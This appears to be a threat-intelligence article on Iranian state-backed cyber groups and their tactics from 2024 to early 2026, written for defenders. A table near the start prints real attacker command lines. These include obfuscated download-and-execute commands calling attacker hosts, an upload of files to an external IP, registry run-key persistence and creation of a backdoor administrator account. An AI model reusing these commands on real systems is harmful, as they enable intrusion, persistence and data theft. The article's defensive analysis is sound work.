Over the past decade, Iran has steadily developed one of the most active and adaptive nation-state cyber ecosystems. Iranian cyber operations blend espionage, disruptive cyberattacks, and influence campaigns, forming a hybrid warfare strategy aligned with geopolitical objectives.

A recent analysis highlights the evolution of Iran’s cyber operations from 2024 through early 2026. The report explores the structure of Iranian cyber organizations, the tactics and techniques they employ, and the strategic shifts driven by escalating regional tensions.

As geopolitical conflict increasingly spills into cyberspace, understanding Iran’s cyber posture is critical for defenders in government, critical infrastructure, and private sector organizations.

Geopolitical Context: Cyber Operations in a Regional Crisis

Between 2024 and March 2026, the geopolitical environment surrounding Iran changed dramatically.

Earlier tensions between Iran and Israel escalated into direct military confrontations, including unprecedented ballistic missile exchanges. At the same time, Iran’s traditional regional proxy network—often referred to as the “Axis of Resistance”—began to fragment after coordinated U.S. and Israeli strikes in early 2026. These developments significantly impacted Iran’s cyber operations and strategic priorities.

Historically, Iranian cyber campaigns have been orchestrated by two primary state institutions:

Islamic Revolutionary Guard Corps (IRGC)
Ministry of Intelligence and Security (MOIS)

Both organizations oversee cyber units and coordinate with contractor groups and proxy actors. The result is a distributed cyber ecosystem capable of conducting espionage, disruption, and psychological operations across global targets.

Cyber activity frequently intensifies alongside geopolitical conflict, reinforcing Iran’s broader hybrid warfare doctrine.

Iranian Cyber Threat Landscape

Iran’s cyber ecosystem consists of multiple Advanced Persistent Threat (APT) groups with varying capabilities, operational goals, and technical sophistication.

These groups conduct:

Cyber espionage
Intellectual property theft
Critical infrastructure targeting
Influence operations
Destructive malware attacks

Targets commonly include:

Government agencies
Energy and oil sectors
Defense contractors
Media organizations
Political institutions

Operations have expanded beyond the Middle East to include the United States, Europe, and other strategic regions.

Threat Actor	Command Line
APT34	powershell.exe -File %APPDATA%\Local\Microsoft\InputPersonalization\TrainedDataStore.ps1
APT35	conhost –headless cmd /c FOR /F “delims=s\ tokens=4” %f IN (‘set^\|findstr PSM’)DO %f -w 1 $zf=’osf.zip’;$pd=’Biography of Mr.leehu hacohn.pdf’;$pdl=’Biography of Mr.leehu hacohn.lnk’;$E=$ENV:Temp;$F=$env:LocalAppData+’\PDFs’;if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+’\’+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+’.pdf’}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]’%PDF’);$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr “$F\Wow” `} ;
APT42	powershell -w 1 “$Pbwpc=(Get-Content -Path ‘%LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt’); &(gcm “i*x) $Pbwpc”
APT42	copy-item C:/Users/{USER}/AppData/Local/Microsoft/Outlook/@example.com.ost ` $env:APPDATA/[email protected]
APT42	rundll32.exe %WINDIR%\system32\davclnt.dll, DavSetCookie datadrift.somee.com@SSL https://datadrift.somee.com/aoh5/[REDACTED].lnk
APT42	powershell -w 1 “$PbwpcDxXtAnaGrsu=(Get-Content -Path %LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt); &(gcm i*x)$PbwpcDxXtAnaGrsu”
APT42	start msedge \””hxxps[://]1drv[.]ms/w/c/208F0gfdtrhkjB256/EXaIieylg5EtG6mcLAdhtdhgdytrfHM31tA?e=pjdsyyI\”;
APT42	Set-ItemProperty -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Run’ -Name ‘Renovation’ -Value “cmd /c \”for %a in (\”%localappdata%\Microsoft\Internet Explorer\List\*\”) do ( start \”\” \”%a\” )\””
APT42	cmd.exe /c set c=cu7rl –s7sl-no-rev7oke -s -d “id=CgYEFk&Prog=2_Mal_vbs.txt&WH=Form.pdf\” -X PO7ST hxxps://prism-west-candy[.]glitch[.]me/Down -o %temp%\\down.v7bs & call %c:7=% & set b=sta7rt \”\” \”%temp%\\down.v7bs\” & call %b:7=%
APT42	conhost –headless %PUBLIC%\Microsoft.bat
APT42	%LOCALAPPDATA%\Caches\pssuspend.exe -accepteula -nobanner <chrome_pid>
APT42	curl.exe -X POST “https://<FIREBASE-ENDPOINT>.json” -H “Content-Type: application/json” -d “{\”LastUpdatTime\”:{\”.sv\”:\”timestamp\”}}” –ssl-no-revoke”
APT42	powershell -w 1 $pnt=(Get-Content -Path %APPDATA%\Microsoft\documentLoger.txt); &(gcm “i*x)$pnt
APT42	cmd /c curl –ssl-no-revoke -o vgh.txt https://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%
APT42	“%WINDIR%\System32\cmd.exe” /c set hm=”cmolbd /c colburl –ssolblno-revoolbke -o vgh.tolbxt https[://]linolbe[.]complolbetely[.]workolbers[.]deolbv/aoh5 & rename vgh.tolbxt temolbp.baolbt & %%tmolbp%% ” & call %%hm:olb=%%
APT42	msedge.exe –no-sandbox –remote-debugging-port=9222 –remote-allow-origins=ws://localhost:9222 –window-position=-32000,-32000
APT42	powershell -w 1 “$lb=’gBjs’;$uq=(invoke-restmethod -UserAgent ‘Chrome’ ‘https://line.completely.workers.dev/aoh52’);.(gcm iee)$uq”
Cyber Av3ngers	uname -v > /tmp/{RANDOM_16_chars}.txt 2>&1
Cyber Av3ngers	hostname > /tmp/{RANDOM_16_chars}.txt 2>&1
Cyber Av3ngers	whoami > /tmp/{RANDOM_16_chars}.txt 2>&1
Cyber Av3ngers	date +%Z > /tmp/{RANDOM_16_chars}.txt 2>&1
Cyber Av3ngers	uname -r > /tmp/{RANDOM_16_chars}.txt 2>&1
Cyber Av3ngers	curl –http2 –header “accept: application/dns-json” “https://1.1.1.1/dns-query?name=google.com
Dust Specter	$di=’%ALLUSERSPROFILE%\WinWebex’;md $di 2>””;$path=$di+’\WinWebex.exe’;Add-Type -A System.Net.Http;$c=New-Object System.Net.Http.HttpClient; $c.DefaultRequestHeaders.UserAgent.ParseAdd(‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0’);[IO.File]::WriteAllBytes($path, $c.GetAsync(‘https://meetingapp.site/webexdownload’).Result.Content.ReadAsByteArrayAsync().Result); $c.Dispose();Register-ScheduledTask -TaskName winWebex -Action (New-ScheduledTaskAction -Execute $path) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 2) -RepetitionDuration ([TimeSpan]::FromDays(9999))) -Settings (New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Seconds 0)) -Force; Start-ScheduledTask -TaskName winWebex;exit;
Dust Specter	“%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe”;New-ItemProperty -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Run’ -Name ‘VLC’ -Value ‘%ALLUSERSPROFILE%\PolGuid\VLC\vlc.exe’ -PropertyType String;New-ItemProperty -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Run’ -Name ‘WingetUI’ -Value ‘%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe’ -PropertyType String;
Infy	chcp 65001 TaskKill /F /IM 8020 Timeout /T 2 /Nobreak Del /ah
Infy	chcp 65001 TaskKill /F /IM 5268 Timeout /T 2 /Nobreak Del /ah
MuddyWater	“%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe” -exec bypass -w -l -file %ALLUSERSPROFILE%\a.ps1
MuddyWater	“%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe” /noconfig /fullpaths @”%WINDIR%\TEMP\dlr5lzwp\dlr5lzwp.cmdline”
MuddyWater	“%WINDIR%\system32\reg.exe” save HKLM\SYSTEM SystemBkup.hiv
MuddyWater	“%WINDIR%\system32\reg.exe” “%WINDIR%\system32\reg.exe” save HKLM\SYSTEM SystemBkup.hiv
MuddyWater	netbird.exe setup –setup-key E48E4A70-4CF4-4A77-946B-C8E50A60855A –management-url
MuddyWater	schtasks /create /tn ForceNetbirdRestart
MuddyWater	net localgroup Administrators user /add
MuddyWater	sc config sshd start= auto
MuddyWater	sc config netbird start= delayed-auto
MuddyWater	wmic useraccount where name=’user’ set passwordexpires=false
MuddyWater	net localgroup Administrateurs user /add
MuddyWater	powershell.exe -WindowStyle Hidden
MuddyWater	net user user Bs@202122 /add
MuddyWater	powershell.exe -Command “Copy-Item -Path %%malware path%% -Destination ‘%ALLUSERSPROFILE%\Logs’ -Force”
MuddyWater	“%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe” (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149.51:443/57576?filter_relational_operator_2=60169).content \| Invoke-Expression
MuddyWater	schtasks /create /sc daily /st 09:00 /tn “DailyUpdate” /tr “%PUBLIC%\Downloads\novaservice.exe”
MuddyWater	powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand [REDACTED]
MuddyWater	$wc = New-Object System.Net.WebClient; $wc.UploadFile(“hxxp://143[.]198[.]5[.]41:443/success”,”%PUBLIC%\downloads\cobe-notes.txt”);
MuddyWater	taskkill /IM novaservice.exe
MuddyWater	Start-Process %ALLUSERSPROFILE%\FMAPP.exe -WindowStyle Hidden
MuddyWater	“%PROGRAMFILES%\Microsoft Office\Office16\WINWORD.EXE” /n
MuddyWater	%WINDIR%\System32\cmd.exe” /c %ALLUSERSPROFILE%\CertificationKit.ini
Parisite	TNC <DC-2 IP> -Port 135
Parisite	ipconfig /all
Parisite	.\SOCKSSrv.exe
Parisite	netstat -nao\|findstr 28443
Parisite	ssh 104[.]238[.]191[.]185 -P 443
Parisite	ssh 104[.]238[.]191[.]185 -p 443
Parisite	Enter-PSSession -ComputerName <DC-2 IP>
Parisite	TNC <DC-2 IP> -Port 389
Parisite	netstat -nao\|findstr 443
Parisite	cmd
Parisite	.\SOCKSSrv.exe
Parisite	netsh i p a v listenport=443 connecthost=127.0.0.1 connectport=28443
Parisite	netsh i p a v listenport=443 connectaddress=127.0.0.1 connectport=28443
Parisite	netsh i p re all
Parisite	.\443.exe
Parisite	%WINDIR%\System32\drivers\conhost.exe -f conhost.dll -ER –ln –path cmd.exe
Tortoiseshell	cmd.exe /C systeminfo \| findstr /I “Domain”
Tortoiseshell	“%PROGRAMFILES%\WinRAR\RAR.exe” a -v1000m -m5 “%PROGRAMFILES%\WinRAR\{COMPANY_NAME}.rar” “C:/Users/{USERNAME}/AppData/Local/Microsoft/Outlook/{TARGET_OST}”
Tortoiseshell	net user DC-01$ P@ssw0rd
Tortoiseshell	%WINDIR%\system32\openssh\ssh.exe[Username]@[IP Address] -p 443 -o ServerAliveInterval=60 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070
Tortoiseshell	reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” /va /f
Tortoiseshell	reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers” /f
Tortoiseshell	SCCM.exe reconfig /target:[REDACTED]

Major Iranian Threat Groups

MuddyWater (Seedworm / Mango Sandstorm)

MuddyWater is believed to operate under Iran’s MOIS and has been active since approximately 2017.

The group primarily focuses on espionage campaigns targeting government and private sector organizations globally.

Typical attack workflow includes:

Spear-phishing emails
Delivery of malicious ZIP files
Execution using native Windows tools
Deployment of backdoors

Their operations heavily rely on PowerShell and command-line tools to maintain stealth.

Tools observed in MuddyWater campaigns include:

Cobalt Strike
PhonyC2
MuddyC2Go
DarkBeatC2
Custom malware such as BugSleep

These tools enable remote access, file exfiltration, screenshot capture, and execution of additional malicious payloads.

APT35 (Charming Kitten / Magic Hound)

APT35 is one of Iran’s most prominent cyber espionage groups.

Active since around 2014, the group focuses on long-term intelligence gathering and surveillance campaigns targeting:

Government officials
Military organizations
Energy companies
Media outlets
Political campaigns

APT35 relies heavily on social engineering and spear-phishing to gain initial access.

Once inside a network, the group deploys both custom and open-source tools such as:

Sponsor
Soldier
BellaCiao
DownPaper
Mimikatz
PsExec

These tools allow attackers to maintain persistence, escalate privileges, and exfiltrate sensitive data from compromised systems.

Attack Techniques and Tactics

Iranian cyber operators frequently rely on tactics defined in the MITRE ATT&CK framework.

The most common techniques observed include:

Initial Access

Phishing remains the dominant entry point.

Key technique:

T1566 – Phishing

Victims are typically tricked into executing malicious attachments or clicking links that lead to credential harvesting or malware downloads.

Execution

Once the victim interacts with malicious content, attackers execute code using command interpreters.

Common techniques:

T1204 – User Execution
T1059 – Command and Scripting Interpreter

PowerShell is particularly favored due to its flexibility and presence on nearly all Windows systems.

Persistence

To maintain long-term access, attackers modify system startup mechanisms.

Typical persistence methods include:

T1547.001 – Registry Run Keys / Startup Folder

These allow malicious scripts to execute automatically after reboot.

Defense Evasion

Iranian threat actors frequently employ techniques to bypass detection.

Examples include:

T1140 – Obfuscated/Compressed Files
T1036 – Masquerading

Malware may be disguised as legitimate system files or administrative utilities.

Credential Access

Attackers often attempt to steal credentials to expand their control across the network.

Common techniques include:

T1555.003 – Credentials from Web Browsers
T1003.001 – LSA Secrets Dumping

These methods enable attackers to harvest stored credentials or extract authentication data directly from system memory.

Discovery and Lateral Movement

After gaining credentials, attackers map the network and move laterally.

Typical discovery commands include:

whoami
ipconfig
systeminfo

Common techniques:

T1082 – System Information Discovery
T1083 – File and Directory Discovery
T1021 – Remote Services (SMB, RDP)

These actions help attackers identify high-value systems and expand their access.

Data Collection and Exfiltration

Before leaving a compromised environment, attackers gather sensitive information and exfiltrate it.

Key techniques include:

T1560 – Archive Collected Data
T1041 – Exfiltration Over C2 Channel
T1071 – Application Layer Protocol (HTTP)

Data is often compressed and transmitted through command-and-control servers using standard web protocols to blend with legitimate traffic.

Living-Off-the-Land: A Core Operational Strategy

One of the defining characteristics of Iranian cyber operations is the heavy use of Living-Off-the-Land Binaries (LOLBins).

Instead of deploying obvious malware, attackers leverage legitimate Windows utilities already present on the system.

Examples include:

PowerShell
Cmd
Regsvr32
Mshta
Rundll32

This approach provides several advantages:

Reduces the need to drop custom malware
Blends malicious activity with legitimate system operations
Evades traditional signature-based security controls

By weaponizing standard administrative tools, Iranian threat actors significantly complicate detection efforts.

The Role of Hacktivists and Proxy Groups

In addition to state-sponsored APT groups, Iran also leverages loosely affiliated hacktivist organizations.

These groups conduct:

Distributed denial-of-service (DDoS) attacks
Website defacement
Data leaks
Psychological and information operations

Hacktivist activity often intensifies during geopolitical crises and may serve as a force multiplier for state cyber campaigns.

Strategic Outlook

Iran’s cyber capabilities demonstrate a mature and evolving threat ecosystem.

Key trends shaping the future include:

Increased reliance on living-off-the-land techniques
Integration of cyber operations with military conflict
Greater coordination between state actors and hacktivist groups
Targeting of critical infrastructure and strategic industries

Even as geopolitical dynamics fluctuate, Iran’s cyber program remains a significant and persistent global threat.

Organizations operating in high-value sectors must assume they are potential targets and invest in proactive detection, threat hunting, and defensive resilience.

Conclusion

Iran has transformed cyber operations into a central component of its national security strategy.

Through a combination of advanced threat groups, proxy actors, and sophisticated tradecraft, Iranian cyber operators continue to conduct espionage and disruption campaigns across the globe.

Their emphasis on stealth techniques—particularly living-off-the-land operations—demonstrates an understanding of modern enterprise environments and defensive tooling.

For defenders, the key takeaway is clear:
Traditional security controls alone are insufficient against adversaries who weaponize legitimate system tools.

Continuous monitoring, behavioral detection, and threat intelligence integration will be critical in defending against Iranian cyber operations in the years ahead.

Iran’s Cyber Strategy Evolves as State-Backed Hackers Expand Global Reach